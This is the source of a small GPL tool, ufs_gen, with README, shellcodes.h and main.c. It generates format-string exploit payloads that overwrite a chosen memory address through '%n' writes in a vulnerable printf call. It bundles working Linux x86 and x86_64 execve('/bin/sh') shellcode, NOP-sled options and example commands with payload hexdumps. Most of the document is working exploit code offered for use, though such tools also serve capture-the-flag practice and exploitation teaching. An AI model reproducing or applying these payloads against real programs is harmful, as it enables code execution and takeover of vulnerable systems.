README
ufs_gen
=======

This software allows you to generate a payload which may override an address
with the value of your choice.

The syntax is quite simple:

There are three parameters needed for the program to run correctly.

stackidx: this parameter specifies how many dwords you need to access the
beginning of your buffer (or payload).

override: the address to override

with: the value to inject at the address overriden

This software is intended to work with an ELF32 generated by a typical code.

example:

int function(const char *payload)
{
    char buffer[BUFSIZ];

    strncpy(buffer, payload, sizeof(buffer));
    buffer[sizeof(buffer) - 1] = '\0';

    printf(buffer);

    return 0;
}

The support of ELF64 and other formats is intended but not written yet.
Although the option 'addrsize' might already be used to specify if an address
is not 4 bytes long, there is very few chances that it would work correctly.

The support of printf(payload) directly (i.e. without a temporary buffer) is 
also planned.

We support the option --prefix and --suffix which respectively prepend and
append their argument to the payload.

We also support the option --sfxnops which adds n NOP byte (0x90) between the
payload and the suffix

Example
=======

user@localhost$ ./ufs_gen --override 0x11223344 --with 0x55667788 --stackidx 4
D3"E3"F3"G3"%120x%4$n%239x%5$n%239x%6$n%239x%7$n

user@localhost$ shellcode="$(perl -e 'print "\x68\x2f\x73\x68\xff\xfe\x44"')"
user@localhost$ ./ufs_gen --override 0x11223344 --with 0x55667788 --stackidx 4 --suffix "$shellcode"  --sfxnops 100 | hexdump -C
NOP bytes are at offset 52 (0x34)
suffix is at offset 152 (0x98)
00000000  44 33 22 11 45 33 22 11  46 33 22 11 47 33 22 11  |D3".E3".F3".G3".|
00000010  25 31 32 30 78 25 34 24  6e 25 32 33 39 78 25 35  |%120x%4$n%239x%5|
00000020  24 6e 25 32 33 39 78 25  36 24 6e 25 32 33 39 78  |$n%239x%6$n%239x|
00000030  25 37 24 6e 90 90 90 90  90 90 90 90 90 90 90 90  |%7$n............|
00000040  90 90 90 90 90 90 90 90  90 90 90 90 90 90 90 90  |................|
*
00000090  90 90 90 90 90 90 90 90  68 2f 73 68 ff fe 44     |........h/sh..D|
0000009f


License
=======

This software is free software covered by the GPL license v2. You should
read the COPYING file to understand what is implied.


NEWS
01/27/14
The support of the option --shellcode has been implemented.
When the user specifies this option, a list of common shellcodes is displayed and the user is able to select one of them.


shellcodes.h
/*
 * Copyright (C) 2014 Olivier Gayot
 *
 * This program is free software; you can redistribute it and/or modify
 * it under the terms of the GNU General Public License as published by
 * the Free Software Foundation; either version 2 of the License, or
 * (at your option) any later version.

 * This program is distributed in the hope that it will be useful,
 * but WITHOUT ANY WARRANTY; without even the implied warranty of
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
 * GNU General Public License for more details.

 * You should have received a copy of the GNU General Public License along
 * with this program; if not, write to the Free Software Foundation, Inc.,
 * 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
 */

#ifndef SHELLCODES_H
#define SHELLCODES_H

typedef struct {
    char *name;
    char *payload;
} shellcode_t;

static shellcode_t common_shellcodes_g[] = {
    {
        .name = "Linux x86\n"
            "\texecve(\"/bin/sh\", 0, 0)",
        .payload = "\x68\x2f\x73\x68\xff"
            "\xfe\x44\x24\x03"
            "\x68\x2f\x62\x69\x6e"
            "\x31\xc0"
            "\xb0\x0b"
            "\x89\xe3"
            "\x31\xc9"
            "\x31\xd2"
            "\xcd\x80"
    }, {
        .name = "Linux x86\n"
            "\tclose(0); open(\"/dev/tty\", 0); execve(\"/bin/sh\", 0, 0)",
        .payload = "\x83\xec\x09"
            "\x31\xc0"
            "\xb0\x06"
            "\x31\xdb"
            "\xcd\x80"
            "\xc7\x04\x24\x2f\x64\x65\x76"
            "\xc7\x44\x24\x04\x2f\x74\x74\x79"
            "\xc0\x6c\x24\x08\x08"
            "\x31\xc0"
            "\xb0\x05"
            "\x89\xe3"
            "\x31\xc9"
            "\xcd\x80"
            "\xc7\x04\x24\x2f\x62\x69\x6e"
            "\xc7\x44\x24\x04\xff\x2f\x73\x68"
            "\xb0\x0b"
            "\x89\xe3"
            "\xc1\x6b\x04\x08"
            "\x31\xc9"
            "\x31\xd2"
            "\xcd\x80"
    }, {
        .name = "Linux x86_64\n"
            "\texecve(\"/bin/sh\", 0, 0)",
        .payload = "\x68\x2f\x62\x69\x6e"
            "\xc7\x44\x24\x04\x2f\x73\x68"
            "\xff"
            "\xfe\x44\x24\x07"
            "\x48\x31\xc0"
            "\xb0\x3b"
            "\x48\x89\xe7"
            "\x48\x31\xf6"
            "\x48\x31\xd2"
            "\x0f\x05"
    },
};

#define SHELLCODE_COUNT \
    ((int)(sizeof(common_shellcodes_g) / sizeof(common_shellcodes_g[0])))


#endif /* SHELLCODES_H */


main.c
/*
 * Copyright (C) 2014 Olivier Gayot
 *
 * This program is free software; you can redistribute it and/or modify
 * it under the terms of the GNU General Public License as published by
 * the Free Software Foundation; either version 2 of the License, or
 * (at your option) any later version.

 * This program is distributed in the hope that it will be useful,
 * but WITHOUT ANY WARRANTY; without even the implied warranty of
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
 * GNU General Public License for more details.

 * You should have received a copy of the GNU General Public License along
 * with this program; if not, write to the Free Software Foundation, Inc.,
 * 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
 */

#include <assert.h>
#include <stdbool.h>
#include <stdlib.h>
#include <string.h>
#include <sysexits.h>
#include <stdio.h>
#include <getopt.h>

#include "shellcodes.h"

static unsigned char payload[4096];

/* address to override */
static unsigned long override_addr_g;

/* address to jump to */
static unsigned long jmp_addr_g;

/* index of the element on the stack which is the beginning of the payload */
static unsigned int idx_stack_g;

/* assume that an address is 'address_size_g' bytes long */
static int address_size_g = 4;

/* prepend the payload with a prefix */
static char *prefix_g = NULL;

/* append suffix to the payload */
static char *suffix_g = NULL;

/* how many NOP bytes (0x90) shall we append before suffix */
static int suffix_nops_g = 0;

/* shall we display a menu with the possible shellcodes ? */
static bool select_shellcode_g = false;

static char *shellcode_g = NULL;

    __attribute__((noreturn))
static void usage(const char *arg0)
{
    (void)arg0;

    fputs("usage:\n\n", stderr);
    fputs(
            "ufs_gen "
            "[--prefix pfx] [--suffix sfx] [--sfxnops n]\n"
            "        --override addr --with addr --stackidx idx\n"
            "        --shellcode\n"
            , stderr);

    exit(EX_USAGE);
}

/*
 * this function uses getopt to parse the options.
 * it returns 0 on success; otherwise it returns a negative number
 */
static int parse_arguments(int argc, char *argv[])
{
    bool override_set = false;
    bool stackidx_set = false;
    bool with_set = false;

    for (;;) {
        /* declaration of the options which we handle */
        enum {
            OPT_OVERRIDE,
            OPT_WITH,
            OPT_STACKIDX,
            OPT_ADDR_SIZE,
            OPT_PREFIX,
            OPT_SUFFIX,
            OPT_SFX_NOPS,
            OPT_SHELLCODE,
        };

        static struct option long_options[] = {
            {"override",  required_argument, 0, OPT_OVERRIDE},
            {"with",      required_argument, 0, OPT_WITH},
            {"stackidx",  required_argument, 0, OPT_STACKIDX},
            {"addrsize",  required_argument, 0, OPT_ADDR_SIZE},
            {"prefix",    required_argument, 0, OPT_PREFIX},
            {"suffix",    required_argument, 0, OPT_SUFFIX},
            {"sfxnops",   required_argument, 0, OPT_SFX_NOPS},
            {"shellcode", no_argument,       0, OPT_SHELLCODE},
        };

        int option_index;
        int c = getopt_long(argc, argv, "", long_options, &option_index);

        if (c == -1) {
            break;
        }

        switch (c) {
            case OPT_OVERRIDE:
                override_addr_g = strtoul(optarg, NULL, 16);
                override_set = true;
                break;
            case OPT_WITH:
                jmp_addr_g = strtoul(optarg, NULL, 16);
                with_set = true;
                break;
            case OPT_STACKIDX:
                idx_stack_g = atoi(optarg);
                stackidx_set = true;
                break;
            case OPT_ADDR_SIZE:
                address_size_g = atoi(optarg);

                if (address_size_g < 1 || address_size_g > 8) {
                    return -1;
                }

                break;
            case OPT_PREFIX:
                prefix_g = optarg;
                break;
            case OPT_SUFFIX:
                suffix_g = optarg;
                break;
            case OPT_SFX_NOPS:
                suffix_nops_g = atoi(optarg);
                break;
            case OPT_SHELLCODE:
                select_shellcode_g = true;
                break;
            default:
                /*
                 * we must have accessed an option which we do not have
                 * specified in our switch-case
                 */

                assert (false);

                break;
        }
    }

    if (optind < argc) {
        return -1;
    }

    if (!override_set || !stackidx_set || !with_set) {
        return -1;
    }

    return 0;
}

/*
 * this function returns the number of remaining bytes to write in order to
 * have a %n printing the expected value
 */
static int calc_remaining(unsigned int needed, unsigned int *so_far)
{
    int ret;

    assert(needed <= 0xff);

    if (needed >= (*so_far % 0x100)) {
        ret = needed - (*so_far % 0x100);
    } else {
        ret = 0x100 - ((*so_far % 0x100) - needed);
    }

    *so_far += ret;

    return ret;
}

int main(int argc, char *argv[])
{
#define PUT_ADDR(_offset) \
    do { \
        typeof(override_addr_g) override_addr = override_addr_g + _offset * 0x10; \
        \
        for (int sh = 0; sh < address_size_g; ++sh) { \
            for (int shift = 0; shift < address_size_g; ++shift) { \
                payload[i++] = (override_addr >> (shift * 8)) & 0xff; \
                ++written; \
            } \
            ++override_addr; \
        } \
    } while (0);

    unsigned int i = 0;
    unsigned int written = 0;
    unsigned int values_pop = 0;

    if (parse_arguments(argc, argv) < 0) {
        usage(argv[0]);
    }

    if (select_shellcode_g) {
        for (;;) {
            char buffer[256];
            int sel;

            /* display the name of the common shellcodes */
            for (int _i = 0; _i < SHELLCODE_COUNT; ++_i) {
                fprintf(stderr, "%02d - %s\n", _i + 1, common_shellcodes_g[_i].name);
            }
            fputs("select a shellcode. CTRL-D for no shellcode: ", stderr);

            if (fgets(buffer, sizeof(buffer), stdin) == NULL)
                break;

            /* check if the selection is valid */
            sel = atoi(buffer);
            if (sel <= 0 || sel > SHELLCODE_COUNT)
                continue;

            shellcode_g = common_shellcodes_g[sel - 1].payload;
            break;
        }
    }

    if (prefix_g != NULL) {
        int len_pfx = strlen(prefix_g);
        int mod_len_pfx = len_pfx % address_size_g;

        int len_padding = (mod_len_pfx == 0) ? 0 : address_size_g - mod_len_pfx;

        memcpy(payload + i, prefix_g, len_pfx);
        i += len_pfx;

        memcpy(payload + i, "\x90\x90\x90\x90\x90\x90\x90", len_padding);
        i += len_padding;

        /* TODO compute wisely these two values */
        written += len_pfx + len_padding;

        idx_stack_g += ((len_pfx + len_padding) / address_size_g);
    }

    PUT_ADDR(0);

    /* override the address */
    for (int shift = 0; shift < address_size_g; ++shift) {
        int remaining;

        if ((remaining = calc_remaining((jmp_addr_g >> (shift * 8)) & 0xff, &written)) < 8) {
            memcpy(payload + i, "ffffffff", remaining);
            i += remaining;
        } else {
            i += sprintf((char *)payload + i, "%%%dx", remaining);
            ++values_pop;
        }

        if (values_pop == idx_stack_g) {
            /* (very) unlikely */

            i += sprintf((char *)payload + i, "%%n");
            ++values_pop;
        } else {
            i += sprintf((char *)payload + i, "%%%d$n", idx_stack_g);
        }

        ++idx_stack_g;
    }

    /* append the NOP bytes */
    if (suffix_nops_g > 0) {
        fprintf(stderr, "NOP bytes are at offset %d (%#x)\n", i, i);
    }
    for (int nop = 0; nop < suffix_nops_g; ++nop) {
        payload[i++] = '\x90';
    }

    /* append the shellcode */
    if (shellcode_g != NULL) {
        fprintf(stderr, "shellcode is at offset %d (%#x)\n", i, i);
        int len_shellcode = strlen(shellcode_g);

        memcpy(payload + i, shellcode_g, len_shellcode);
        i += len_shellcode;
    }

    if (suffix_g != NULL) {
        fprintf(stderr, "suffix is at offset %d (%#x)\n", i, i);
        int len_suffix = strlen(suffix_g);

        memcpy(payload + i, suffix_g, len_suffix);
        i += len_suffix;
    }

    /* we write our payload */
    fwrite(payload, 1, i, stdout);

    return 0;

#undef PUT_ADDR
}
